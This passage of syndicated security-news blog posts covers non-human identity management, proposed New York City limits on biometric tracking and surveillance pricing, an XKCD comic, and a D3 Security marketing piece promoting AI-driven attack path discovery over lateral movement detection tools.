ensure that only authorized entities can access the system, mitigating the risk of fraud.</p><p>Utilizing NHIs efficiently is also demonstrated in strategic partnerships within various industries. A compelling example of optimal performance through NHIs which discusses the impact of secure identity management on AI performance.</p><h3>Strategizing Future Adoption of NHIs</h3><p>How can organizations remain ahead with NHIs? Moving forward, it is imperative for organizations to focus on developing robust NHI management strategies to maintain their security posture.</p><p>Key strategies include:</p><p><strong>Strategic Cross-Department Collaboration</strong>: Ensuring seamless communication and strategies between cybersecurity, R&amp;D, and operational teams to manage NHIs efficiently.</p><p><strong>Focus on Identity Lifecycle Management</strong>: Developing policies that cover the entire identity lifecycle, from creation to decommissioning, ensuring all facets are secure.</p><p><strong>Continuous Education and Training</strong>: Implementing ongoing training programs for security teams to better understand advancements in NHI technology and management practices.</p><p>With emphasized by industry experts, the adoption of NHIs as a strategic asset is critical for organizations to thrive securely. The integration of <a href="https://entro.security/blog/entro-custom-secrets-self-serve-detection-rules-across-code-cloud-and-agents/">custom secrets self-serve detection rules</a> across systems offers a glimpse into how seamless identity management can operate within intricate cloud configurations.</p><p>Incorporating these proactive measures into an organization’s security strategy ensures not only a responsive defense mechanism but also establishes a forward-thinking approach to cybersecurity challenges. NHIs are more than just security tokens; they are agents of transformation that can enhance the efficiency and resilience of business operations across industries.</p><p>The strategic management of NHIs provides a pathway to not merely withstand the dynamic challenges of cybersecurity but to harness them into opportunities for enhanced business coherence and trust. For additional insights on how organizations have effectively kept <a href="https://entro.security/blog/keeping-security-in-stride-why-we-built-entros-third-pillar-for-agentic-ai/" rel="noopener">security in stride with Agentic AI</a>, this resource illustrates successful integration strategies.</p><p>While we scale new heights in technology, embracing Non-Human Identities with a strategic, informed, and sophisticated approach will shape the future of secure, agile, and reliable digital enterprises.</p><p>The post <a href="https://entro.security/are-you-certain-your-agentic-ai-optimally-performs/">Are you certain your Agentic AI optimally performs</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/are-you-certain-your-agentic-ai-optimally-performs/" data-a2a-title="Are you certain your Agentic AI optimally performs"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fare-you-certain-your-agentic-ai-optimally-performs%2F&amp;linkname=Are%20you%20certain%20your%20Agentic%20AI%20optimally%20performs" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fare-you-certain-your-agentic-ai-optimally-performs%2F&amp;linkname=Are%20you%20certain%20your%20Agentic%20AI%20optimally%20performs" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fare-you-certain-your-agentic-ai-optimally-performs%2F&amp;linkname=Are%20you%20certain%20your%20Agentic%20AI%20optimally%20performs" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fare-you-certain-your-agentic-ai-optimally-performs%2F&amp;linkname=Are%20you%20certain%20your%20Agentic%20AI%20optimally%20performs" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fare-you-certain-your-agentic-ai-optimally-performs%2F&amp;linkname=Are%20you%20certain%20your%20Agentic%20AI%20optimally%20performs" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/are-you-certain-your-agentic-ai-optimally-performs/">https://entro.security/are-you-certain-your-agentic-ai-optimally-performs/</a> </p>

<p>New York City lawmakers are pushing to ban private businesses from using biometric tools like voice and facial recognition software to track the public.</p><p>While the desire to use surveillance technology in stores to fight shoplifting is understandable, <a href="https://www.nyclu.org/commentary/new-york-grocery-stores-are-scanning-your-face-lawmakers-can-stop-it" rel="noreferrer noopener nofollow">lawmakers</a> and <a href="https://www.politico.com/newsletters/digital-future-daily/2026/03/16/the-facial-recognition-grocery-fight-00830499" rel="noreferrer noopener nofollow">privacy advocates</a> are worried that the data could be repurposed to profile customers.</p><p>The New York City Council has held a <a href="https://legistar.council.nyc.gov/MeetingDetail.aspx?ID=1390774&amp;GUID=79F32E76-264B-40AD-81A8-81CE9AF71294&amp;Options=info%7C&amp;Search=" rel="noreferrer noopener nofollow">hearing</a> over two bills that would ban city landlords and businesses from using facial recognition technology.</p><ul class="wp-block-list"> <li>One proposal would make it illegal for any public place to use biometric recognition technology to identify or verify a customer.</li> <li>The other would prohibit landlords from installing, activating, or using any biometric recognition technology that identifies tenants or their guests.</li> </ul><p>In this article we want to focus on some of the reasons behind these proposals.</p><p>For context, it’s good to know that in New York City, businesses that collect biometric data are already <a href="https://www.nyclu.org/resources/policy/testimonies/testimony-implementation-local-law-3-2021" rel="noreferrer noopener nofollow">required</a> to post standardized signs letting people know.</p><p>Let’s look at what happens when your face becomes your ID, and every movement in a store can be turned into another data point.</p><h2 class="wp-block-heading" id="h-why-gathering-biometric-data-is-considered-bad">Why gathering biometric data is considered bad</h2><p>Collecting biometric data raises several objections. The most pressing ones are:</p><ul class="wp-block-list"> <li><strong>Unique but hard-to-erase identifiers. </strong>While you can reset a password, your face is harder to change. This means data leaks or abuse of facial templates, gait, or voiceprints can create permanent risks and be linked across databases.</li> <li><strong>Accuracy and bias concerns. </strong><a href="https://www.aclu-mn.org/news/biased-technology-automated-discrimination-facial-recognition/" rel="noreferrer noopener nofollow">Studies</a> and civil liberties groups have found that facial recognition system can be <a href="https://www.scientificamerican.com/article/police-facial-recognition-technology-cant-tell-black-people-apart/" rel="noreferrer noopener nofollow">error-prone and biased</a> across different groups.</li> <li><strong>Lack of meaningful consent. </strong>In practice, supermarkets and landlords using facial recognition are giving people a mere theoretical choice. People can submit their biometrics or forego basic services. Critics argue that this undermines genuine consent.</li> <li><strong>Chilling effect. </strong>The feeling of constantly being watched everywhere you go is an uncomfortable one, and can discourage people from engaging in everyday, legitimate activities.</li> <li><strong>Surveillance pricing. </strong>This deserves some more explanation, which we’ll cover next.</li> </ul><h2 class="wp-block-heading" id="h-what-is-surveillance-pricing">What is surveillance pricing?</h2><p>It’s essentially how your face becomes an unerasable loyalty card.</p><p>Imagine you go into a local supermarket and notice that different people pay different prices for the same item. Would that feel fair?</p><p>Surveillance pricing refers to the use of detailed consumer data and behavioral signals to dynamically adjust prices.</p><p>Some characterize it as retailers using big‑data profiles to segment customers into increasingly narrow groups, down to the level of potentially charging each person the maximum the model thinks they are willing to pay.</p><p>We already see versions of this online. When you’re <a href="https://www.theguardian.com/lifeandstyle/2025/may/21/booking-flights-online-dynamic-pricing-ticket-is-it-legal-australia" rel="noreferrer noopener nofollow">looking for airline tickets</a>, for example, prices can change based on various signals. But it can be hard to notice, and companies <a href="https://news.delta.com/delta-responds-misinformation-around-ai-pricing" rel="noreferrer noopener nofollow">tell us it’s not personal</a>. But imagine that same logic quietly following you into the supermarket.</p><p>How this works online is relatively straightforward: websites track clicks, time on page, cart activity, and past spending to estimate how sensitive you are to price changes. </p><p>In physical stores it’s more complex, but not impossible. Data from in-store security systems that also collect biometrics and facial recognition can be combined with loyalty programs, apps, and in‑store Wi‑Fi analytics could, in theory, be combined to build similar profiles. </p><p>Electronic shelf labels (ESL) can already allow retailers to change shelf prices instantly across a store or specific sections.</p><p>This could lead to situations where wealthier or more brand-loyal customers are quietly charged more. Or vulnerable groups could be targeted with manipulative discounts for higher‑margin or even less healthy products.</p><h2 class="wp-block-heading" id="h-what-to-do">What to do?</h2><p>Unfortunately, there’s no simple way to privacy‑hack your way out of a system that can turn your body into a tracking ID. The most effective fix is boring but powerful: laws with teeth, regulators that actually enforce them, and stores that don’t hide what they’re doing.</p><p>You could:</p><ul class="wp-block-list"> <li>Avoid stores that openly advertise biometric scanning when there are alternatives.</li> <li> Support local and national efforts to regulate biometric tracking and related practices, such as the proposals from the New York City Council.</li> </ul><p>We shouldn’t have to trade access to food, housing, or basic services for the ability to move through a city without our bodies being mined for data. If we don’t draw that line now, practices like surveillance pricing could quietly bake inequality and discrimination into something as mundane as buying groceries.</p><hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"><p><strong>We don’t just report on privacy—we offer you the option to use it.</strong></p><p>Privacy risks should never spread beyond a headline. Keep your online privacy yours by using <a href="https://www.malwarebytes.com/vpn">Malwarebytes Privacy VPN</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/could-your-face-change-what-you-pay-nyc-wants-limits-on-biometric-tracking/" data-a2a-title="Could your face change what you pay? NYC wants limits on biometric tracking"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcould-your-face-change-what-you-pay-nyc-wants-limits-on-biometric-tracking%2F&amp;linkname=Could%20your%20face%20change%20what%20you%20pay%3F%20NYC%20wants%20limits%20on%20biometric%20tracking" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcould-your-face-change-what-you-pay-nyc-wants-limits-on-biometric-tracking%2F&amp;linkname=Could%20your%20face%20change%20what%20you%20pay%3F%20NYC%20wants%20limits%20on%20biometric%20tracking" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcould-your-face-change-what-you-pay-nyc-wants-limits-on-biometric-tracking%2F&amp;linkname=Could%20your%20face%20change%20what%20you%20pay%3F%20NYC%20wants%20limits%20on%20biometric%20tracking" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcould-your-face-change-what-you-pay-nyc-wants-limits-on-biometric-tracking%2F&amp;linkname=Could%20your%20face%20change%20what%20you%20pay%3F%20NYC%20wants%20limits%20on%20biometric%20tracking" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcould-your-face-change-what-you-pay-nyc-wants-limits-on-biometric-tracking%2F&amp;linkname=Could%20your%20face%20change%20what%20you%20pay%3F%20NYC%20wants%20limits%20on%20biometric%20tracking" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.malwarebytes.com/">Malwarebytes</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Malwarebytes">Malwarebytes</a>. Read the original post at: <a href="https://www.malwarebytes.com/blog/news/2026/03/could-your-face-change-what-you-pay-nyc-wants-limits-on-biometric-tracking">https://www.malwarebytes.com/blog/news/2026/03/could-your-face-change-what-you-pay-nyc-wants-limits-on-biometric-tracking</a> </p>

<figure class=" sqs-block-image-figure intrinsic "> <p> <a class=" sqs-block-image-link " href="https://xkcd.com/3209/"></a></p> <p> <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/0cb29db4-14a2-445e-9457-1e4cc4398d4a/plums.png" data-image-dimensions="251x409" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" src="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/0cb29db4-14a2-445e-9457-1e4cc4398d4a/plums.png?format=1000w" width="251" height="409" sizes="auto, (max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/0cb29db4-14a2-445e-9457-1e4cc4398d4a/plums.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/0cb29db4-14a2-445e-9457-1e4cc4398d4a/plums.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/0cb29db4-14a2-445e-9457-1e4cc4398d4a/plums.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/0cb29db4-14a2-445e-9457-1e4cc4398d4a/plums.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/0cb29db4-14a2-445e-9457-1e4cc4398d4a/plums.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/0cb29db4-14a2-445e-9457-1e4cc4398d4a/plums.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/0cb29db4-14a2-445e-9457-1e4cc4398d4a/plums.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs"></p> <p> <figcaption class="image-caption-wrapper"> <p class=""><strong>via the comic artistry and dry wit of Randall Munroe, creator of XKCD</strong></p> </figcaption></p></figure><p><a href="https://www.infosecurity.us/blog/2026/3/20/randall-munroes-xkcd-plums">Permalink</a></p><p> </p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/randall-munroes-xkcd-plums/" data-a2a-title="Randall Munroe’s XKCD ‘Plums’"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frandall-munroes-xkcd-plums%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Plums%E2%80%99" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frandall-munroes-xkcd-plums%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Plums%E2%80%99" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frandall-munroes-xkcd-plums%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Plums%E2%80%99" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frandall-munroes-xkcd-plums%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Plums%E2%80%99" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Frandall-munroes-xkcd-plums%2F&amp;linkname=Randall%20Munroe%E2%80%99s%20XKCD%20%E2%80%98Plums%E2%80%99" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.infosecurity.us/">Infosecurity.US</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Marc Handelman">Marc Handelman</a>. Read the original post at: <a href="https://xkcd.com/3209/">https://xkcd.com/3209/</a> </p>

<p>The average time to detect a breach used to be measured in months. Now it’s measured in minutes. And your <a href="https://d3security.com/glossary/">lateral movement detection tools</a> still can’t keep up.</p><p>Here’s the uncomfortable truth: <strong>90% of organizations experienced lateral movement in their last breach</strong>, and most detected it too late. The average eCrime attacker achieves a complete breakout in just 29 minutes, according to <a href="https://www.crowdstrike.com/global-threat-report/" rel="noreferrer noopener">CrowdStrike’s 2026 Global Threat Report</a>. Your detection tools are fighting a 70-minute alert investigation timeline with a 56-minute delay before a SOC analyst even <em>begins</em> to act. By then, the attacker is already pivoting.</p><p>The problem is structural.</p><h2 class="wp-block-heading">The Blind Spot in Lateral Movement Detection Tools</h2><h3 class="wp-block-heading">Structural Gaps in Detection Coverage</h3><p>Traditional lateral movement detection tools work in silos. They monitor individual signals (network traffic, endpoint behavior, credentials used, privileged access) but they don’t <em>see</em> the story connecting them. They’re like security cameras in different rooms of a building that never share footage.</p><p>An attacker exploits this structural gap daily. They move from the compromised finance analyst to a mid-tier file server. Your EDR flags the movement. Your SIEM flags the unusual login. Your NDR flags the unusual data transfer. But none of these tools talk to each other in real time. So you get three independent alerts, three separate investigations, three chances to miss the full scope of the compromise.</p><p>This is why 67% of alerts go uninvestigated. Not because analysts are asleep. Because they can’t correlate disparate signals fast enough to understand what they’re looking at.</p><h3 class="wp-block-heading">Speed Limitations in Alert Investigation</h3><p>The second problem: stealth. Modern attacks don’t announce themselves. CrowdStrike’s 2026 data shows <strong>82% of current detections are malware-free attacks</strong>: pure human-operated lateral movement using legitimate tools and stolen credentials. Your lateral movement detection tools are trained to spot malicious code, unusual process chains, and behavioral anomalies. But when an attacker uses your own admin credentials to move laterally, when they use RDP or PowerShell as you do every day, when they leverage legitimate tools, the signal disappears into the noise.</p><p>Traditional lateral movement detection tools catch the obvious move. They miss the smart attacker.</p><p>The third problem is scope. When lateral movement detection tools finally flag something suspicious, they show you an alert. Not a map. Not a timeline. Not what the attacker <em>accessed</em>. You get a data point, and from that point, your SOC team must manually follow the thread backward and forward to understand what happened. That’s why the average investigation takes 70 minutes, and that’s <em>if</em> the alert survives the investigation prioritization queue.</p><div style="display: flex; justify-content: center; align-items: center; width: 100%; min-height: auto;"> <object type="image/svg+xml" data="https://d3security.com/wp-content/uploads/2026/03/MorpheusAPD-3.svg" width="100%" height="auto" style="max-width: 800px;"></object> </div><h2 class="wp-block-heading">How Attack Path Discovery Changes the Equation</h2><p><a href="https://d3security.com/morpheus/investigation/">Attack Path Discovery</a> (APD) represents a fundamental shift in how you understand compromise.</p><p>Instead of detecting individual lateral moves, APD correlates evidence across your <em>entire security stack</em> (endpoint, network, identity, cloud, data, applications) simultaneously. It doesn’t wait for a single tool to flag something suspicious. It maps the full logical journey an attacker took, showing you exactly which systems were accessed, which credentials were used, what data was touched, and which systems are now at risk.</p><p>This matters because lateral movement is a sequence of connected events. Traditional tools see the tree. APD sees the forest.</p><p>When an attacker moves from the compromised endpoint to a file server to a database, traditional lateral movement detection tools produce three separate alerts (or none, if the attacker was subtle). APD produces one clear narrative: the attack path. It shows the entry point, every hop, every privilege escalation, every sensitive data access. A complete picture of the compromise in one coherent story.</p><p>This changes how fast your SOC can respond. It changes what they can actually prevent.</p><p> </p><h2 class="wp-block-heading">How Morpheus AI Implements Attack Path Discovery</h2><p><a href="https://d3security.com/morpheus/">Morpheus AI</a> is purpose-built for this. It’s a cybersecurity-specific large language model trained for 24 months by 60 security specialists to understand attack paths as sequences, not isolated events. Rather than a lateral movement detection tool layered on top of a general-purpose platform, it represents a fundamental shift in attack understanding.</p><p>Here’s what that means in practice:</p><h3 class="wp-block-heading">Multi-Dimensional Correlation</h3><p>Morpheus AI ingests data from 800+ security integrations, every tool in your stack. More importantly, it understands the <em>relationships</em> between those data sources. It knows that an unusual network connection + a new credential use + a data access event = a potential lateral movement sequence, even if each individual signal is subtle.</p><h3 class="wp-block-heading">Self-Healing Integrations and Contextual Playbooks</h3><p><strong><a href="https://d3security.com/morpheus/self-healing-integrations/">Self-Healing Integrations</a>.</strong> APIs drift. Integrations break. When they do, most platforms stop collecting data. Morpheus AI’s self-healing integration layer detects API drift automatically and fixes it, so you don’t lose visibility during an attack because a Splunk connector drifted.</p><p><strong>Contextual Playbook Generation.</strong> You don’t have to choose between speed and accuracy. Morpheus AI generates response playbooks <em>at runtime</em>, based on the actual evidence it found. These are playbooks tailored to the specific attack path it discovered, not templated responses or generic runbooks. This means your SOC can start responding to the actual compromise, not a hypothetical one. This kind of <a href="https://d3security.com/morpheus/response/">security automation</a> is what separates reactive from proactive security operations.</p><h3 class="wp-block-heading">Sub-2-Minute Investigation</h3><p>While traditional lateral movement detection tools leave SOC analysts staring at an alert for 70 minutes trying to understand context, Morpheus AI delivers a complete attack path narrative in under 2 minutes. It answers the questions your team would spend an hour manually investigating: What was the entry point? Where did they move? What can they access now? What’s the blast radius?</p><h2 class="wp-block-heading">A Real-World Scenario: Why Lateral Movement Detection Tools Fail</h2><p>Consider a scenario from real SOC experience:</p><p>A finance analyst clicks a phishing link. Their endpoint is compromised. They don’t know it yet.</p><p><strong>Hour 0:00</strong> — The attacker lands on the compromised endpoint. Traditional lateral movement detection tools might flag unusual process activity, but the endpoint wasn’t running active threat hunting. The alert sits in a queue.</p><p><strong>Hour 0:15</strong> — The attacker extracts the analyst’s cached credentials and uses them to RDP into a mid-tier file server. Traditional lateral movement detection tools might flag the RDP connection (unusual for this user, unusual time of day) but the organization has thousands of RDP connections daily. The alert is low-confidence. It goes to the bottom of the triage queue.</p><p><strong>Hour 0:22</strong> — The attacker moves from the file server to a database server. They extract a list of customer accounts. Traditional lateral movement detection tools flag a data exfiltration event. But the database connection came from a known internal server, using cached credentials. Low-confidence. Queue.</p><p><strong>Hour 1:05</strong> — A security analyst finally begins investigating one of these alerts. They spend 70 minutes correlating events from endpoint, network, and database logs to understand the full scope: entry point, lateral movement path, data accessed.</p><p><strong>Hour 2:15</strong> — Response begins.</p><p>With Morpheus AI’s <a href="https://d3security.com/morpheus/investigation/">Attack Path Discovery</a>:</p><p><strong>Hour 0:22</strong> — Morpheus AI correlates the endpoint compromise, the credential extraction, the unusual RDP connection, the suspicious database access, and the data exfiltration into a single coherent narrative. It generates a playbook: isolate the compromised endpoint, revoke cached credentials, audit database access, lock down the affected servers.</p><p><strong>Hour 0:25</strong> — The SOC analyst sees a complete attack path, not three separate alerts. Response begins immediately. The attacker has been active for 22 minutes. Your organization stops them at minute 25.</p><p>The difference between lateral movement detection tools and Attack Path Discovery is fundamental. It’s the difference between seeing the attack and understanding it. Between spending 70 minutes investigating and 2 minutes responding.</p><h2 class="wp-block-heading">Why This Matters for Your Bottom Line</h2><p>The average breach involving lateral movement costs <strong>$4.88 million</strong>. A third of that cost comes from investigation and response time. Cutting investigation time by an order of magnitude (from 70 minutes to 2 minutes) is transformational.</p><p>More importantly, it’s about what you can actually prevent. When your SOC team can see a complete attack path in 2 minutes instead of an hour, they can intervene during the attack. They can block the next lateral move. They can isolate systems before data is exfiltrated. They stop the attacker mid-sequence, not after full compromise.</p><p>Traditional lateral movement detection tools react to what already happened. Attack Path Discovery prevents what’s about to happen.</p><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="960" height="540" src="https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1.png" alt="Cover art for the whitepaper titled: Morpheus AI-Driven Autonomous Investigation, Triage, and Response" class="wp-image-55641" srcset="https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1.png 960w, https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1-300x169.png 300w, https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1-768x432.png 768w" sizes="auto, (max-width: 960px) 100vw, 960px"></figure><h2 class="wp-block-heading">The Verdict: Why Lateral Movement Detection Tools Aren’t Enough</h2><p>Your lateral movement detection tools are working as designed. They’re catching individual lateral moves. But in an environment where the average attacker completes a full breakout in 29 minutes, individual detection isn’t enough. You need correlation. You need speed. You need the full attack path, not isolated alerts.</p><p>That’s what separates Attack Path Discovery from lateral movement detection tools. It’s a fundamentally different model: one built on autonomous multi-dimensional correlation across your entire security stack, delivered in the time it takes to pour a cup of coffee.</p><p>Morpheus AI brings this model to your organization without requiring you to rip out your existing tools. It integrates with 800+ platforms. It learns your specific environment. It generates playbooks that your team can execute immediately.</p><p>Lateral movement detection tools have a place in your security program. What matters is whether you can afford to rely on them alone. You need correlation, speed, and the full attack path.</p><h2 class="wp-block-heading">See Attack Path Discovery in Action</h2><p><a href="https://d3security.com/demo/">Request a live demonstration</a> of <a href="https://d3security.com/morpheus/">Morpheus AI</a> tracing a complete attack path across your security stack in under 2 minutes.</p><figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="1920" height="1080" src="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-%E2%80%94-Attack-Path-Discovery-vs.-Lateral-Movement-Detection.jpg" alt="" class="wp-image-59260" srcset="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Attack-Path-Discovery-vs.-Lateral-Movement-Detection.jpg 1920w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Attack-Path-Discovery-vs.-Lateral-Movement-Detection-300x169.jpg 300w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Attack-Path-Discovery-vs.-Lateral-Movement-Detection-1024x576.jpg 1024w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Attack-Path-Discovery-vs.-Lateral-Movement-Detection-768x432.jpg 768w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-Attack-Path-Discovery-vs.-Lateral-Movement-Detection-1536x864.jpg 1536w" sizes="auto, (max-width: 1920px) 100vw, 1920px"></figure><p><strong>Read the Full Resource: </strong><a href="https://d3security.com/resources/attack-path-discovery-vs-lateral-movement/"><strong>Attack Path Discovery vs. Lateral Movement Detection: Why Detection Alone Falls Short</strong></a></p><p>A detailed comparison of lateral movement detection tools vs. Attack Path Discovery, with real-world scenarios and timing analysis.</p><p><em>Explore more cybersecurity terms and concepts in the <a href="https://d3security.com/glossary/">D3 Security Glossary</a>.</em></p><p><script type="application/ld+json"> { "@context": "https://schema.org", "@type": "FAQPage", "mainEntity": [ { "@type": "Question", "@id": "#q1", "name": "What are lateral movement detection tools and how do they work?", "acceptedAnswer": { "@type": "Answer", "text": "Lateral movement detection tools monitor network traffic, endpoint behavior, and user activity to identify when an attacker moves from one system to another within a compromised network. They analyze patterns like unusual login attempts, credential usage, and data access to flag suspicious movement between systems." } }, { "@type": "Question", "@id": "#q2", "name": "Why are traditional lateral movement detection tools not enough?", "acceptedAnswer": { "@type": "Answer", "text": "Traditional lateral movement detection tools operate in silos, monitoring individual signals without correlation. They generate separate alerts from endpoint, network, and identity tools that teams must manually correlate. This delays investigation by an average of 70 minutes, while attackers complete breakouts in 29 minutes." } }, { "@type": "Question", "@id": "#q3", "name": "What is Attack Path Discovery and how is it different?", "acceptedAnswer": { "@type": "Answer", "text": "Attack Path Discovery (APD) correlates evidence across your entire security stack—endpoint, network, identity, cloud, data, applications—simultaneously. Instead of generating multiple independent alerts, APD creates one coherent narrative showing the complete attack path, enabling sub-2-minute investigation versus 70+ minutes with traditional lateral movement detection tools." } }, { "@type": "Question", "@id": "#q4", "name": "Can I use Attack Path Discovery alongside my existing lateral movement detection tools?", "acceptedAnswer": { "@type": "Answer", "text": "Yes. Attack Path Discovery complements traditional lateral movement detection tools rather than replacing them. It ingests data from 800+ security integrations including EDR, SIEM, NDR, and identity platforms, creating unified attack narratives from signals your existing lateral movement detection tools generate." } }, { "@type": "Question", "@id": "#q5", "name": "What is the impact of faster lateral movement detection on breach costs?", "acceptedAnswer": { "@type": "Answer", "text": "Breaches involving lateral movement cost an average of $4.88 million, with one-third of that cost attributed to investigation and response time. Reducing investigation time from 70 minutes to 2 minutes can save millions in remediation costs and prevent attackers from reaching critical assets before detection." } } ] } </script></p><p>The post <a href="https://d3security.com/blog/attack-path-discovery-vs-lateral-movement/">Your Lateral Movement Detection Tools Are Missing 90% of Attacks. Here’s Why.</a> appeared first on <a href="https://d3security.com/">D3 Security</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/your-lateral-movement-detection-tools-are-missing-90-of-attacks-heres-why/" data-a2a-title="Your Lateral Movement Detection Tools Are Missing 90% of Attacks. Here’s Why."><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fyour-lateral-movement-detection-tools-are-missing-90-of-attacks-heres-why%2F&amp;linkname=Your%20Lateral%20Movement%20Detection%20Tools%20Are%20Missing%2090%25%20of%20Attacks.%20Here%E2%80%99s%20Why." title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fyour-lateral-movement-detection-tools-are-missing-90-of-attacks-heres-why%2F&amp;linkname=Your%20Lateral%20Movement%20Detection%20Tools%20Are%20Missing%2090%25%20of%20Attacks.%20Here%E2%80%99s%20Why." title="LinkedIn" 